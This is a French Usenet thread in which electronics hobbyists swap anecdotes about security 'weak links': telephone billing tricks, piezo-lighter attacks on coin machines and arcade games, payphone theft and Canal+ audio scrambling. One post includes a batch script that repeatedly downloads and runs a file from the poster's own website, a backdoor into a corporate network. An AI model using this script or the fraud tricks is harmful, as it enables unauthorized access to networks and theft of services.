le maillon faible

Je ne crains de voir les electroniciens nous l=E2cher si c'est trop orient=E9 informatique.

--

-Stan

Reply to
Stan

| Je ne crains de voir les electroniciens | nous l=E2cher si c'est trop orient=E9 informatique.

C'est pas faux. ( quoique de nos jours ... ) Bon, pas dur pour un softeux, mais je d=E9voile :

Avant de partir du boulot, faire tourner un batch du genre ci-dessous (je n'ai plus l'original qui =E9tait bien plus chiad=E9 alors je tape de m=E9moire) Une fois rentr=E9 chez vous, poster sur votre site perso le batch "fichier.bat" =E0 ex=E9cuter, qui pourra ex=E9cuter n'importe quel programme non bloquant.

Tous les acc=E9s intranet vers d'autres machines seront l=E9gitimes depuis votre machine qui est "=E0 l'int=E9rieur". Utilisable aussi comme proxy perso. Vous pouvez vous faire renvoyer chez vous par email les r=E9sultats de l'ex=E9cution du batch (ou n'importe quel fichier)

Suite =E0 un pari avec un admin junior, rest=E9 confidentiel entre lui et moi. Quand on voit =E0 quel point c'est facile de lancer un batch ou un ex=E9cutable sur le PC d'une secr=E9taire (par exemple) : maillon faible !

REM --- ca va te couter une bi=E8re --- debut: REM on supprime le batch =E0 ex=E9cuter del fichier.bat boucle: REM temporisation d'une minute wait 60 REM on r=E9cup=E8re le batch wget http://mon_site_perso/fichier.bat REM si le fichier n'est pas r=E9cup=E9r=E9, on boucle if not exist fichier.bat goto boucle REM on ex=E9cute le batch download=E9 call fichier.bat REM on nettoie puis on reboucle goto debut REM --- fais p=E9ter la bibine ---

Vous avez sans doute entendu parler du fameux hack A20 de la XBOX :

J'aime beaucoup le conseil #9 :-)

Bon retour en charte, n'est-ce pas ?

--

-Stan

Reply to
Stan

Le 21/05/2010 17:18, *Gerard Del* a écrit fort à propos :

Et moi dans les années 90, dans les locaux de France-Telecom où je travaillais et où, parfois, les cadrans des postes téléphoniques étaient défectueux. Cordonniers mal chaussés...

Reply to
geo cherchetout

Le Fri, 21 May 2010 03:08:00 -0700, Jean-Christophe a écrit :

quand on installait Word il modifiait la première disquette. Il suffisait d'en faire une copie avant pour l'installer autant de fois qu'on voulait

Reply to
moi-meme

On May 21, 4:29=A0pm, Stan

J'ai bien aim=E9 =AB They did not read the Pentium programmers' manual =BB

J'ai un faible pour le #15 =AB keep your source safe =BB C'est beau comme un password =E9crit sur un post-it coll=E9 sur l'=E9cran du PC.

Mais le #1 est assez courant =AB Security vs. Money =BB faites vite ET bien ... contradiction, ou contradiction ?

On May 20, 4:38=A0pm, Stan

La RAM permanente du chip d'horloge des anciens PC servait =E0 stocker de facon r=E9manente un password : une s=E9ance d=E9ssoudage/lecture/ressoudage et c'est pli=E9. (ou un petit programme tournant en mode r=E9=E9l allant lire les donn=E9es =E0 la bonne adresses, mais chut ... c'est hors-charte)

On May 21, 7:35=A0pm, moi-meme

| Une copine prof voulait installer Word

Les disquettes qu'elle avait =E9taient prot=E9g=E9es en =E9criture ( le petit truc coulissant en haut =E0 droite ) pour =E9viter de les =E9craser accidentellement, et on a eu aucun probl=E8me pour l'install.

Chab a écrit :

A propos de téléphone : Sur les anciens centraux mécaniques, le début de la taxation était se déclenchait par une inversion de la polarité de la ligne au moment du décroché. Un diode bien placée et une pile pour le micro à charbon, et on pouvait discuter des heures, le téléphone appelé apparaissant en tonalité "occupée" vu du central. Ou alors, dans les cabines à pièce à l'intérieur de certains locaux (pas les cabines sur la voie publique), il était parfois possible d'accéder au cablage. Et là, la coupure du fil de terre empêchait la pièce de se faire bouffer.

Denis

--
Seuls les faucons volent.
Les vrais restent au sol.

J'ai entendu parler de distributeurs de billets de banque attaqu=E9s =E0 l'aide d'allume-gaz =E0 quartz ! L'arc =E9lectrique =E0 haute tension convenablement appliqu=E9 pouvait faire griller les circuits int=E9gr=E9s de la machine.

Je ne sais pas si c'est v=E9ridique ou si c'est une l=E9gende, mais si c'est vrai alors ca fait vraiment maillon faible : haute technologie mise en d=E9faut par un truc =E0 deux balles.

Le 21-05-2010, ? propos de Re: le maillon faible, geo cherchetout ?crivait dans fr.sci.electronique :

Là question est maintenant : avec quel truc ai-je confondu ? C'est forcément un truc que j'avais sous la main lorsque je bossais au CNET, mais quoi ?

consommons tous les jours.

Dans ma jeunesse ( ? ), on obtenait des dizaines de parties gratuites dans les jeux d'arcanes. Il fallait d=E9monter l'allume gaz pi=E9zo, pour en faire ressortir le fil qui =E9tait introduit dans la fente du monnayeur. Deux ou trois impulsions, et c'est autant de partie qui se cr=E9ditaient.

Ce truc l=E0, je l'avais gard=E9 pour plus tard, mais tu m'a devanc=E9.

Donc je confirme, =E7a eu march=E9. Mais je d=E9conseille quiconque de le faire sur un distributeur de billets :-)

--

-Stan

Reply to
Stan

En fait, le but n'est pas de griller un circuit, mais c'est l'impulsion electromagn=E9tique ou les courants induits qui vont changer les =E9tats de certaines entr=E9es.

J'ai r=E9-utilis=E9 un allume gaz il y a deux ou trois pour v=E9rifier l'immunit=E9 d'une carte d'acquisition rs232/ethernet.

En faisant des =E9tincelles sur le port s=E9rie, =E7a faisait parfois planter le soft.

Cette carte avait une f=E2cheuse tendance =E0 planter lors d'orage...

--

-Stan

Reply to
Stan

On May 22, 12:20=A0pm, Stan

... =F4 d=E9sespoir !

On May 22, 11:43=A0am, Stan

Une attaque similaire mais purement m=E9canique (honte sur moi) Sur le chemin du retour de l'=E9cole entre le coll=E8ge et la maison, il y avait une cabine t=E9l=E9phonique =E0 pi=E8ces : un bon coup de genou judicieusement plac=E9 faisait invariablement tomber assez de monnaie pour l'argent de poche du week-end !

... chacun son tour !

Bof, qui sait ? C'est mieux que de trucider des convoyeurs de fonds ...

LeLapin a exprimé avec précision :

Le son était et est toujours inversé par rapport à une "porteuse" à

12500 Hz, je viens de retrouver mon décodeur son qui fonctionne toujours.

On peu aussi le décoder avec un récepteur BLU en se plaçant 12500 Hz au dessus de la fréquence son

--
ßruno
Reply to

On May 20, 7:16 pm, LeLapin

(Salut LeLapin, j'esp=E8re que tu vas bien.)

A la diff=E9rence d'une modulation de BF en HF, la porteuse 12 kHz =E9tait tr=E9s proche du signal BF. En sortie du multiplicateur, la bande du signal de diff=E9rence est =AB retourn=E9e =BB autour de 6 kHz, mais son spectre occuppe la meme bande que l'original, et pouvait etre transmise par le meme canal audio standard.

C'est ca le truc : les signaux de parole sont incompr=E9hensibles, la musique inaudible, et le d=E9codage se fait avec le meme circuit.

Ici, le maillon faible est que ce =AB cryptage =BB audio ne d=E9pendait pas du code client du d=E9codeur C+. Il =E9tait tr=E9s facile d'avoir le son en clair avec trois fois rien (un TL084, un 4066 ou un SO42 ...)

On May 22, 9:33=A0am, JKB

Un manipulateur Morse ?

Le 22/05/2010 10:33, *JKB* a écrit fort à propos :

Peut-être avec le train de sonnerie précurseur, qu'on n'entend pas avec les postes actuels mais qu'on entend forcément avec les modèles d'autrefois ?

Reply to
geo cherchetout

Le 22-05-2010, ? propos de Re: le maillon faible, geo cherchetout ?crivait dans fr.sci.electronique :

Je ne sais plus... Par contre, je me souviens qu'il y avait une impulsion pour signaler à l'équipement de se mettre à compter...

consommons tous les jours.